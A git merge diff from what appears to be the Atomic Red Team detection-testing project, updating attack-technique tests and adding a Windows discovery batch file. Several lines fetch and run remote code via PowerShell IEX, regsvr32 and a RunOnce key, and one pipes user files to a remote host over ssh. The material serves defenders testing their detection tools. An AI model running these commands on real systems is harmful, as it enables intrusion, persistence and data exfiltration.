Merge branch 'master' into t1105-fix

ARTifacts/Chain_Reactions/chain_reaction_Argonaut.ps1

@@ -8,11 +8,11 @@ $temp = $env:temp
 # Note that these are alias' for Invoke-WebRequest.
 # The concept is to see how curl and wget look in you detection tools vs what is commonly used (IWR, Invoke-WebRequest, etc)
 
-wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\1.bat
+wget https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\1.bat
 
 # Alternate Ending: Using curl
 
-curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat -OutFile $temp\2.bat
+curl https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat -OutFile $temp\2.bat
 
 # Execute the 1.bat file
 

ARTifacts/Chain_Reactions/chain_reaction_Plutonium.bat

@@ -16,7 +16,7 @@ SCHTASKS /Create /SC MINUTE /TN "Atomic Testing" /TR "regsvr32.exe /s /u /i:http
 :: Execution: https://attack.mitre.org/wiki/Technique/T1086
 :: Have PowerShell download the Discovery.bat, output to a local file (for review later)
 
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')" > output.txt
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > output.txt
 
 :: Tactic: Credential Access
 :: Technique: Create Account https://attack.mitre.org/wiki/Technique/T1136

ARTifacts/Chain_Reactions/chain_reaction_Reactor.bat

@@ -36,7 +36,7 @@ tasklist.exe | findstr defender
 :: Technique: PowerShell: https://attack.mitre.org/wiki/Technique/T1086
 :: Technique: Multiple Discovery
 
-powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
+powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
 
 :: Tactic: Collection
 :: Technique: Automated Collection: https://attack.mitre.org/wiki/Technique/T1119

ARTifacts/Labs/Webinar11062017-Labs.bat

@@ -22,7 +22,7 @@ regsvr32.exe /s /u /i:https://raw.githubusercontent.com/redcanaryco/atomic-red-t
 
 :: Step 2. This payload will execute an discovery sequence T1087
 ::    https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat
-::	  Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat')"
+::	  Alternate Endings ;-) => powershell.exe "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')"
 
 net user Administrator /domain & net Accounts & net localgroup administrators & net use & net share & net group "domain admins" /domain & net config workstation & net accounts & net accounts /domain & net view & reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows" & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices & reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit & reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell & reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce & reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run & wmic useraccount list & wmic useraccount get /ALL & wmic startup list brief & wmic share list & wmic service get name,displayname,pathname,startmode & wmic process list brief & wmic process get caption,executablepath,commandline & wmic qfe get description,installedOn /format:csv & arp -a & "cmd.exe" /C whoami & ipconfig /displaydns & route print & netsh advfirewall show allprofiles & systeminfo & qwinsta & quser
 

ARTifacts/Misc/Discovery.bat

@@ -0,0 +1,44 @@
+net user Administrator /domain
+net Accounts
+net localgroup administrators
+net use
+net share
+net group "domain admins" /domain
+net config workstation
+net accounts
+net accounts /domain
+net view
+sc query
+reg query "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows"
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunServices
+reg query HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Notify
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit
+reg query HKCU\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\\Shell
+reg query HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\ShellServiceObjectDelayLoad
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnceEx
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce
+reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run
+wmic useraccount list
+wmic useraccount get /ALL
+wmic startup list brief
+wmic share list
+wmic service get name,displayname,pathname,startmode
+wmic process list brief
+wmic process get caption,executablepath,commandline
+wmic qfe get description,installedOn /format:csv
+arp -a
+whoami
+ipconfig /displaydns
+route print
+netsh advfirewall show allprofiles
+systeminfo
+qwinsta
+quser

atomics/T1002/T1002.md

@@ -24,7 +24,7 @@ Requires Network: No</blockquote>
 <br/>
 
 ## Atomic Test #1 - Compress Data for Exfiltration With PowerShell
-TODO
+An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration 
 
 **Supported Platforms:** Windows
 
@@ -43,7 +43,7 @@ dir #{input_file} -Recurse | Compress-Archive -DestinationPath #{output_file}
 <br/>
 
 ## Atomic Test #2 - Compress Data for Exfiltration With Rar
-TODO
+An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration 
 
 **Supported Platforms:** Windows
 
@@ -62,7 +62,7 @@ rar a -r #{output_file} #{input_file}
 <br/>
 
 ## Atomic Test #3 - Data Compressed - nix
-TODO
+An adversary may compress data (e.g., sensitive documents) that is collected prior to exfiltration 
 
 **Supported Platforms:** Linux, macOS
 

atomics/T1014/T1014.md

@@ -20,9 +20,7 @@ Permissions Required: Administrator, SYSTEM, root</blockquote>
 
 - [Atomic Test #2 - Loadable Kernel Module based Rootkit](#atomic-test-2---loadable-kernel-module-based-rootkit)
 
-- [Atomic Test #3 - LD_PRELOAD based Rootkit](#atomic-test-3---ld_preload-based-rootkit)
-
-- [Atomic Test #4 - Windows Signed Driver Rootkit Test](#atomic-test-4---windows-signed-driver-rootkit-test)
+- [Atomic Test #3 - Windows Signed Driver Rootkit Test](#atomic-test-3---windows-signed-driver-rootkit-test)
 
 
 <br/>
@@ -63,20 +61,7 @@ sudo modprobe #{rootkit_file}
 <br/>
 <br/>
 
-## Atomic Test #3 - LD_PRELOAD based Rootkit
-LD_PRELOAD based Rootkit
-
-**Supported Platforms:** Linux
-
-
-#### Run it with `sh`!
-```
-export LD_PRELOAD=$PWD/#{rootkit_file}
-```
-<br/>
-<br/>
-
-## Atomic Test #4 - Windows Signed Driver Rootkit Test
+## Atomic Test #3 - Windows Signed Driver Rootkit Test
 This test exploits a signed driver to execute code in Kernel.
 SHA1 C1D5CF8C43E7679B782630E93F5E6420CA1749A7
 We leverage the work done here:

atomics/T1022/T1022.md

@@ -24,7 +24,7 @@ Requires Network: No</blockquote>
 <br/>
 
 ## Atomic Test #1 - Data Encrypted
-TODO
+Encrypt data for exiltration
 
 **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
 

atomics/T1030/T1030.md

@@ -23,11 +23,6 @@ Take a file/directory, split it into 5Mb chunks
 **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
 
 
-#### Inputs
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | TODO | todo | TODO|
-
 #### Run it with `sh`!
 ```
 cd /tmp/

atomics/T1048/T1048.md

@@ -51,6 +51,13 @@ Local to Remote
 **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
 
 
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| domain | target SSH domain | url | target.example.com|
+| user_name | username for domain | string | atomic|
+| password | password for user | string | atomic|
+
 #### Run it with `sh`!
 ```
 tar czpf - /Users/* | openssl des3 -salt -pass #{password} | ssh #{user_name}@#{domain} 'cat > /Users.tar.gz.enc'

atomics/T1060/T1060.md

@@ -79,7 +79,7 @@ RunOnce Key Persistence via PowerShell
 #### Run it with `powershell`!
 ```
 $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
-set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
+set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
 Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
 ```
 <br/>

atomics/T1060/T1060.yaml

@@ -56,7 +56,7 @@ atomic_tests:
     name: powershell
     command: |
         $RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
-        set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/Windows/Payloads/Discovery.bat`")"'
+        set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
         Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
 - name: Startup Folder
   description: |

atomics/T1074/T1074.md

@@ -27,6 +27,6 @@ Utilize powershell to download discovery.bat and save to a local file
 
 #### Run it with `powershell`!
 ```
-"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
+"IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log
 ```
 <br/>

atomics/T1074/T1074.yaml

@@ -13,4 +13,4 @@ atomic_tests:
   executor:
     name: powershell
     command: |
-      "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1074/Discovery.bat')" > c:\windows\pi.log
+      "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat')" > c:\windows\pi.log

atomics/T1090/T1090.md

@@ -0,0 +1,50 @@
+# T1090 - Connection Proxy
+## [Description from ATT&CK](https://attack.mitre.org/wiki/Technique/T1090)
+<blockquote>A connection proxy is used to direct network traffic between systems or act as an intermediary for network communications. Many tools exist that enable traffic redirection through proxies or port redirection, including HTRAN, ZXProxy, and ZXPortMap. (Citation: Trend Micro APT Attack Tools)
+
+The definition of a proxy can also be expanded out to encompass trust relationships between networks in peer-to-peer, mesh, or trusted connections between networks consisting of hosts or systems that regularly communicate with each other.
+
+The network may be within a single organization or across organizations with trust relationships. Adversaries could use these types of relationships to manage command and control communications, to reduce the number of simultaneous outbound network connections, to provide resiliency in the face of connection loss, or to ride over existing trusted communications paths between victims to avoid suspicion.
+
+Detection: Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Network activities disassociated from user-driven actions from processes that normally require user direction are suspicious.
+
+Analyze network data for uncommon data flows (e.g., a client sending significantly more data than it receives from a server or between clients that should not or often do not communicate with one another). Processes utilizing the network that do not normally have network communication or have never been seen before are suspicious. Analyze packet contents to detect communications that do not follow the expected protocol behavior for the port that is being used. (Citation: University of Birmingham C2)
+
+Platforms: Linux, macOS, Windows
+
+Data Sources: Process use of network, Process monitoring, Netflow/Enclave netflow, Packet capture
+
+Requires Network: Yes
+
+Contributors: Walker Johnson</blockquote>
+
+## Atomic Tests
+
+- [Atomic Test #1 - Connection Proxy](#atomic-test-1---connection-proxy)
+
+
+<br/>
+
+## Atomic Test #1 - Connection Proxy
+Enable traffic redirection.
+
+To undo changes made by this test:
+  unset http_proxy
+  unset https_proxy
+
+Note that this test may conflict with pre-existing system configuration.
+
+**Supported Platforms:** macOS, Linux
+
+
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| proxy_server | Proxy server URL (host:port) | url | 127.0.0.1:8080|
+| proxy_scheme | Protocol to proxy (http or https) | string | http|
+
+#### Run it with `sh`!
+```
+export #{proxy_scheme}_proxy=#{proxy_server}
+```
+<br/>

atomics/T1090/T1090.yaml

@@ -0,0 +1,34 @@
+---
+attack_technique: T1090
+display_name: Connection Proxy
+
+atomic_tests:
+- name: Connection Proxy
+  description: |
+    Enable traffic redirection.
+
+    To undo changes made by this test:
+      unset http_proxy
+      unset https_proxy
+
+    Note that this test may conflict with pre-existing system configuration.
+
+  supported_platforms:
+    - macos
+    - linux
+
+  input_arguments:
+    proxy_server:
+      description: Proxy server URL (host:port)
+      type: url
+      default: 127.0.0.1:8080
+
+    proxy_scheme:
+      description: Protocol to proxy (http or https)
+      type: string
+      default: http
+
+  executor:
+    name: sh
+    command: |
+      export #{proxy_scheme}_proxy=#{proxy_server}

atomics/T1099/T1099.md

@@ -32,7 +32,7 @@ Stomps on the access timestamp of a file
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| target_filename | Path of file that we are going to stomp on last access time | Path | |
+| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
 
 #### Run it with `sh`!
 ```
@@ -50,7 +50,7 @@ Stomps on the modification timestamp of a file
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| target_filename | Path of file that we are going to stomp on last access time | Path | |
+| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
 
 #### Run it with `sh`!
 ```
@@ -71,7 +71,7 @@ Sudo or root privileges are required to change date. Use with caution.
 #### Inputs
 | Name | Description | Type | Default Value | 
 |------|-------------|------|---------------|
-| target_filename | Path of file that we are going to stomp on last access time | Path | |
+| target_filename | Path of file that we are going to stomp on last access time | Path | /opt/filename|
 
 #### Run it with `sh`!
 ```

atomics/T1099/T1099.yaml

@@ -13,6 +13,7 @@ atomic_tests:
     target_filename:
       description: Path of file that we are going to stomp on last access time
       type: Path
+      default: /opt/filename
   executor:
     name: sh
     command: |
@@ -28,6 +29,7 @@ atomic_tests:
     target_filename:
       description: Path of file that we are going to stomp on last access time
       type: Path
+      default: /opt/filename
   executor:
     name: sh
     command: |
@@ -47,6 +49,7 @@ atomic_tests:
     target_filename:
       description: Path of file that we are going to stomp on last access time
       type: Path
+      default: /opt/filename
   executor:
     name: sh
     command: |

atomics/T1105/T1105.md

@@ -18,20 +18,20 @@ Requires Network: Yes</blockquote>
 
 ## Atomic Tests
 
-- [Atomic Test #1 - xxxx](#atomic-test-1---xxxx)
+- [Atomic Test #1 - rsync - scp - sftp remote file copy](#atomic-test-1---rsync---scp---sftp-remote-file-copy)
 
 
 <br/>
 
-## Atomic Test #1 - xxxx
-xxxx
+## Atomic Test #1 - rsync - scp - sftp remote file copy
+Utilize rsync, scp and sftp to perform a remote file copy
 
 **Supported Platforms:** Linux, macOS
 
 
 #### Run it with `bash`!
 ```
-### TODO: Not sure how to handle commands that need to be run on multiple systems
+### FIX: Not sure how to handle commands that need to be run on multiple systems
 
 # Adversary System Configuration
 # Ensure SSH access has been configured for an adversary account

atomics/T1150/T1150.md

@@ -23,7 +23,7 @@ Permissions Required: User, Administrator</blockquote>
 <br/>
 
 ## Atomic Test #1 - Plist Modification
-TODO
+Modify MacOS plist file in one of two directories
 
 **Supported Platforms:** macOS
 

atomics/T1158/T1158.md

@@ -41,7 +41,7 @@ Permissions Required: User</blockquote>
 
 - [Atomic Test #6 - Show all hidden files](#atomic-test-6---show-all-hidden-files)
 
-- [Atomic Test #7 - Create visible Directories](#atomic-test-7---create-visible-directories)
+- [Atomic Test #7 - Create Visible Directories](#atomic-test-7---create-visible-directories)
 
 - [Atomic Test #8 - Create hidden directories and files](#atomic-test-8---create-hidden-directories-and-files)
 
@@ -67,7 +67,7 @@ echo "this file is hidden" > .hidden-directory/.hidden-file
 <br/>
 
 ## Atomic Test #2 - Mac Hidden file
-TODO
+Hide a file on MacOS
 
 **Supported Platforms:** macOS
 
@@ -99,11 +99,16 @@ mv #{filename} .#{output_filename}
 <br/>
 
 ## Atomic Test #4 - Hidden files
-Requieres Apple Dev Tools
+Requires Apple Dev Tools
 
 **Supported Platforms:** macOS
 
 
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| filename | path of file to hide | path | /tmp/evil|
+
 #### Run it with `sh`!
 ```
 setfile -a V #{filename}
@@ -112,11 +117,16 @@ setfile -a V #{filename}
 <br/>
 
 ## Atomic Test #5 - Hide a Directory
-xxx
+Hide a directory on MacOS
 
 **Supported Platforms:** macOS
 
 
+#### Inputs
+| Name | Description | Type | Default Value | 
+|------|-------------|------|---------------|
+| filename | path of file to hide | path | /tmp/evil|
+
 #### Run it with `sh`!
 ```
 chflags hidden #{filename}
@@ -125,7 +135,7 @@ chflags hidden #{filename}
 <br/>
 
 ## Atomic Test #6 - Show all hidden files
-xxx
+Show all hidden files on MacOS
 
 **Supported Platforms:** macOS
 
@@ -137,8 +147,8 @@ defaults write com.apple.finder AppleShowAllFiles YES
 <br/>
 <br/>
 
-## Atomic Test #7 - Create visible Directories
-xxx
+## Atomic Test #7 - Create Visible Directories
+Create visible directories on MacOS and Linux
 
 **Supported Platforms:** macOS, Linux
 
@@ -154,7 +164,7 @@ ls visible-directory
 <br/>
 
 ## Atomic Test #8 - Create hidden directories and files
-xxx
+Create hidden directories and files on Nix platforms
 
 **Supported Platforms:** macOS, Linux
 

atomics/T1158/T1158.yaml

@@ -51,11 +51,15 @@ atomic_tests:
 
 - name: Hidden files
   description: |
-    Requieres Apple Dev Tools
+    Requires Apple Dev Tools
 
   supported_platforms:
     - macos
-
+  input_arguments:
+    filename:
+      description: path of file to hide
+      type: path
+      default: /tmp/evil
   executor:
     name: sh
     command: |
@@ -67,7 +71,11 @@ atomic_tests:
 
   supported_platforms:
     - macos
-
+  input_arguments:
+    filename:
+      description: path of file to hide
+      type: path
+      default: /tmp/evil
   executor:
     name: sh
     command: |

atomics/T1160/T1160.md

@@ -24,7 +24,7 @@ Permissions Required: Administrator</blockquote>
 <br/>
 
 ## Atomic Test #1 - Launch Daemon
-TODO
+Utilize LaunchDaemon to launch `Hello World`
 
 **Supported Platforms:** macOS
 

atomics/T1168/T1168.md

@@ -36,7 +36,7 @@ Contributors: Anastasios Pingios</blockquote>
 <br/>
 
 ## Atomic Test #1 - Cron Job
-TODO
+Set a cron job
 
 **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
 
@@ -54,7 +54,7 @@ echo "* * * * * #{script}" > /tmp/persistevil && crontab /tmp/persistevil
 <br/>
 
 ## Atomic Test #2 - Cron Job
-TODO
+Manually set a cron job
 
 **Supported Platforms:** macOS, CentOS, Ubuntu, Linux
 

atomics/T1183/T1183.md

@@ -22,13 +22,13 @@ Permissions Required: Administrator, SYSTEM</blockquote>
 
 - [Atomic Test #1 - IFEO Add Debugger](#atomic-test-1---ifeo-add-debugger)
 
-- [Atomic Test #2 - IFEO GLobal Flags](#atomic-test-2---ifeo-global-flags)
+- [Atomic Test #2 - IFEO Global Flags](#atomic-test-2---ifeo-global-flags)
 
 
 <br/>
 
 ## Atomic Test #1 - IFEO Add Debugger
-TODO
+Leverage Global Flags Settings
 
 **Supported Platforms:** Windows
 
@@ -46,7 +46,7 @@ REG ADD "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution
 <br/>
 <br/>
 
-## Atomic Test #2 - IFEO GLobal Flags
+## Atomic Test #2 - IFEO Global Flags
 Leverage Global Flags Settings
 
 **Supported Platforms:** Windows

atomics/T1207/T1207.md

@@ -40,11 +40,6 @@ Utilize Mimikatz DCShadow method to simulate behavior of a Domain Controller
 **Supported Platforms:** Windows
 
 
-#### Inputs
-| Name | Description | Type | Default Value | 
-|------|-------------|------|---------------|
-| output_file | TODO | todo | TODO|
-
 #### Run it with these steps!
 1. Start Mimikatz and use !processtoken (and not token::elevate - as it elevates a thread) to escalate to SYSTEM.
 2. Start another mimikatz with DA privileges. This is the instance which registers a DC and is used to "push" the attributes.

atomics/index.md

@@ -45,7 +45,7 @@
   - Atomic Test #4: Hidden files [macos]
   - Atomic Test #5: Hide a Directory [macos]
   - Atomic Test #6: Show all hidden files [macos]
-  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #7: Create Visible Directories [macos, linux]
   - Atomic Test #8: Create hidden directories and files [macos, linux]
   - Atomic Test #9: Create ADS command prompt [windows]
   - Atomic Test #10: Create ADS PowerShell [windows]
@@ -55,7 +55,7 @@
   - Atomic Test #1: Installing Hyper-V Feature [windows]
 - [T1183 Image File Execution Options Injection](./T1183/T1183.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
-  - Atomic Test #2: IFEO GLobal Flags [windows]
+  - Atomic Test #2: IFEO Global Flags [windows]
 - T1215 Kernel Modules and Extensions [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1161 LC_LOAD_DYLIB Addition [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1177 LSASS Driver [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -191,7 +191,7 @@
   - Atomic Test #4: Hidden files [macos]
   - Atomic Test #5: Hide a Directory [macos]
   - Atomic Test #6: Show all hidden files [macos]
-  - Atomic Test #7: Create visible Directories [macos, linux]
+  - Atomic Test #7: Create Visible Directories [macos, linux]
   - Atomic Test #8: Create hidden directories and files [macos, linux]
   - Atomic Test #9: Create ADS command prompt [windows]
   - Atomic Test #10: Create ADS PowerShell [windows]
@@ -200,7 +200,7 @@
 - T1143 Hidden Window [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1183 Image File Execution Options Injection](./T1183/T1183.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
-  - Atomic Test #2: IFEO GLobal Flags [windows]
+  - Atomic Test #2: IFEO Global Flags [windows]
 - T1054 Indicator Blocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1066 Indicator Removal from Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1070 Indicator Removal on Host](./T1070/T1070.md)
@@ -253,8 +253,7 @@
 - [T1014 Rootkit](./T1014/T1014.md)
   - Atomic Test #1: Loadable Kernel Module based Rootkit [linux]
   - Atomic Test #2: Loadable Kernel Module based Rootkit [linux]
-  - Atomic Test #3: LD_PRELOAD based Rootkit [linux]
-  - Atomic Test #4: Windows Signed Driver Rootkit Test [windows]
+  - Atomic Test #3: Windows Signed Driver Rootkit Test [windows]
 - [T1085 Rundll32](./T1085/T1085.md)
   - Atomic Test #1: Rundll32 execute JavaScript Remote Payload With GetObject [windows]
 - T1198 SIP and Trust Provider Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -304,7 +303,7 @@
   - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
 - [T1183 Image File Execution Options Injection](./T1183/T1183.md)
   - Atomic Test #1: IFEO Add Debugger [windows]
-  - Atomic Test #2: IFEO GLobal Flags [windows]
+  - Atomic Test #2: IFEO Global Flags [windows]
 - [T1160 Launch Daemon](./T1160/T1160.md)
   - Atomic Test #1: Launch Daemon [macos]
 - [T1050 New Service](./T1050/T1050.md)
@@ -557,7 +556,7 @@
 - [T1076 Remote Desktop Protocol](./T1076/T1076.md)
   - Atomic Test #1: RDP [windows]
 - [T1105 Remote File Copy](./T1105/T1105.md)
-  - Atomic Test #1: xxxx [linux, macos]
+  - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
 - T1021 Remote Services [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1091 Replication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1184 SSH Hijacking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
@@ -623,7 +622,8 @@
 # command-and-control
 - T1043 Commonly Used Port [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1092 Communication Through Removable Media [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
-- T1090 Connection Proxy [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
+- [T1090 Connection Proxy](./T1090/T1090.md)
+  - Atomic Test #1: Connection Proxy [macos, linux]
 - T1094 Custom Command and Control Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1024 Custom Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1132 Data Encoding](./T1132/T1132.md)
@@ -638,7 +638,7 @@
 - T1205 Port Knocking [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1219 Remote Access Tools [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - [T1105 Remote File Copy](./T1105/T1105.md)
-  - Atomic Test #1: xxxx [linux, macos]
+  - Atomic Test #1: rsync - scp - sftp remote file copy [linux, macos]
 - T1071 Standard Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1032 Standard Cryptographic Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)
 - T1095 Standard Non-Application Layer Protocol [CONTRIBUTE A TEST](https://atomicredteam.io/contributing)

atomics/index.yaml

@@ -1125,7 +1125,7 @@ persistence:
           mkdir .hidden-directory
           echo "this file is hidden" > .hidden-directory/.hidden-file
     - name: Mac Hidden file
-      description: 'TODO
+      description: 'Hide a file on MacOS
 
 '
       supported_platforms:
@@ -1158,29 +1158,39 @@ persistence:
 
 '
     - name: Hidden files
-      description: 'Requieres Apple Dev Tools
+      description: 'Requires Apple Dev Tools
 
 '
       supported_platforms:
       - macos
+      input_arguments:
+        filename:
+          description: path of file to hide
+          type: path
+          default: "/tmp/evil"
       executor:
         name: sh
         command: 'setfile -a V #{filename}
 
 '
     - name: Hide a Directory
-      description: 'xxx
+      description: 'Hide a directory on MacOS
 
 '
       supported_platforms:
       - macos
+      input_arguments:
+        filename:
+          description: path of file to hide
+          type: path
+          default: "/tmp/evil"
       executor:
         name: sh
         command: 'chflags hidden #{filename}
 
 '
     - name: Show all hidden files
-      description: 'xxx
+      description: 'Show all hidden files on MacOS
 
 '
       supported_platforms:
@@ -1190,8 +1200,8 @@ persistence:
         command: 'defaults write com.apple.finder AppleShowAllFiles YES
 
 '
-    - name: Create visible Directories
-      description: 'xxx
+    - name: Create Visible Directories
+      description: 'Create visible directories on MacOS and Linux
 
 '
       supported_platforms:
@@ -1205,7 +1215,7 @@ persistence:
           ls
           ls visible-directory
     - name: Create hidden directories and files
-      description: 'xxx
+      description: 'Create hidden directories and files on Nix platforms
 
 '
       supported_platforms:
@@ -1550,7 +1560,7 @@ persistence:
       identifier: T1183
     atomic_tests:
     - name: IFEO Add Debugger
-      description: 'TODO
+      description: 'Leverage Global Flags Settings
 
 '
       supported_platforms:
@@ -1570,7 +1580,7 @@ persistence:
           File Execution Options\#{target_binary}" /v Debugger /d "#{payload_binary}"
 
 '
-    - name: IFEO GLobal Flags
+    - name: IFEO Global Flags
       description: 'Leverage Global Flags Settings
 
 '
@@ -1780,7 +1790,7 @@ persistence:
       identifier: T1160
     atomic_tests:
     - name: Launch Daemon
-      description: 'TODO
+      description: 'Utilize LaunchDaemon to launch `Hello World`
 
 '
       supported_platforms:
@@ -1963,7 +1973,7 @@ persistence:
       identifier: T1168
     atomic_tests:
     - name: Cron Job
-      description: 'TODO
+      description: 'Set a cron job
 
 '
       supported_platforms:
@@ -1982,7 +1992,7 @@ persistence:
 
 '
     - name: Cron Job
-      description: 'TODO
+      description: 'Manually set a cron job
 
 '
       supported_platforms:
@@ -2595,7 +2605,7 @@ persistence:
       identifier: T1150
     atomic_tests:
     - name: Plist Modification
-      description: 'TODO
+      description: 'Modify MacOS plist file in one of two directories
 
 '
